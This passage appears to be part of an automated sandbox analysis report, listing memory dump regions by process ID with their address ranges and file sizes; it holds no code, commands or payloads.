                          Filesize

                          10.8MB

                        • memory/3088-2-0x00007FF8C10F3000-0x00007FF8C10F5000-memory.dmp

                          Filesize

                          8KB

                        • memory/3088-14-0x00007FF8C10F0000-0x00007FF8C1BB1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3088-13-0x00007FF8C10F0000-0x00007FF8C1BB1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3088-12-0x00000268FBED0000-0x00000268FBEF2000-memory.dmp

                          Filesize

                          136KB

                        • memory/3304-36-0x0000000005E40000-0x0000000005EA6000-memory.dmp

                          Filesize

                          408KB

                        • memory/3304-58-0x0000000074A20000-0x00000000751D0000-memory.dmp

                          Filesize

                          7.7MB

                        • memory/3304-43-0x0000000006970000-0x000000000698A000-memory.dmp

                          Filesize

                          104KB

                        • memory/3304-44-0x00000000076A0000-0x0000000007736000-memory.dmp

                          Filesize

                          600KB

                        • memory/3304-45-0x0000000007600000-0x0000000007622000-memory.dmp

                          Filesize

                          136KB

                        • memory/3304-46-0x0000000008870000-0x0000000008E14000-memory.dmp

                          Filesize

                          5.6MB

                        • memory/3304-41-0x0000000006430000-0x000000000647C000-memory.dmp

                          Filesize

                          304KB

                        • memory/3304-48-0x0000000074A20000-0x00000000751D0000-memory.dmp

                          Filesize

                          7.7MB

                        • memory/3304-49-0x0000000074A20000-0x00000000751D0000-memory.dmp

                          Filesize

                          7.7MB

                        • memory/3304-50-0x0000000074A20000-0x00000000751D0000-memory.dmp

                          Filesize

                          7.7MB

                        • memory/3304-51-0x0000000074A2E000-0x0000000074A2F000-memory.dmp

                          Filesize

                          4KB

                        • memory/3304-52-0x0000000074A20000-0x00000000751D0000-memory.dmp

                          Filesize

                          7.7MB

                        • memory/3304-53-0x0000000074A20000-0x00000000751D0000-memory.dmp

                          Filesize

                          7.7MB

                        • memory/3304-54-0x0000000074A20000-0x00000000751D0000-memory.dmp

                          Filesize

                          7.7MB

                        • memory/3304-55-0x0000000008E20000-0x000000000C124000-memory.dmp

                          Filesize

                          51.0MB

                        • memory/3304-56-0x0000000074A20000-0x00000000751D0000-memory.dmp

                          Filesize

                          7.7MB

                        • memory/3304-57-0x0000000074A20000-0x00000000751D0000-memory.dmp

                          Filesize

                          7.7MB

                        • memory/3304-42-0x0000000007C40000-0x00000000082BA000-memory.dmp

                          Filesize

                          6.5MB

                        • memory/3304-59-0x0000000074A20000-0x00000000751D0000-memory.dmp

                          Filesize

                          7.7MB

                        • memory/3304-61-0x0000000074A20000-0x00000000751D0000-memory.dmp

                          Filesize

                          7.7MB

                        • memory/3304-40-0x00000000063F0000-0x000000000640E000-memory.dmp

                          Filesize

                          120KB

                        • memory/3304-38-0x0000000005FA0000-0x00000000062F4000-memory.dmp

                          Filesize

                          3.3MB

                        • memory/3304-21-0x0000000074A2E000-0x0000000074A2F000-memory.dmp

                          Filesize

                          4KB

                        • memory/3304-22-0x0000000004E60000-0x0000000004E96000-memory.dmp

                          Filesize

                          216KB

                        • memory/3304-37-0x0000000005F30000-0x0000000005F96000-memory.dmp

                          Filesize

                          408KB

                        • memory/3304-31-0x0000000005CA0000-0x0000000005CC2000-memory.dmp

                          Filesize

                          136KB

                        • memory/3304-24-0x0000000005630000-0x0000000005C58000-memory.dmp

                          Filesize

                          6.2MB

                        • memory/3304-23-0x0000000074A20000-0x00000000751D0000-memory.dmp

                          Filesize

                          7.7MB

                        • memory/3304-25-0x0000000074A20000-0x00000000751D0000-memory.dmp

                          Filesize

                          7.7MB

                        • memory/3560-76-0x0000000000400000-0x0000000000478000-memory.dmp

                          Filesize

                          480KB

                        • memory/3560-77-0x0000000000400000-0x0000000000478000-memory.dmp

                          Filesize

                          480KB

                        • memory/3560-79-0x0000000000400000-0x0000000000478000-memory.dmp

                          Filesize

                          480KB

                        • memory/4228-80-0x0000000000400000-0x0000000000462000-memory.dmp

                          Filesize

                          392KB

                        • memory/4228-82-0x0000000000400000-0x0000000000462000-memory.dmp

                          Filesize

                          392KB

                        • memory/4228-78-0x0000000000400000-0x0000000000462000-memory.dmp

                          Filesize

                          392KB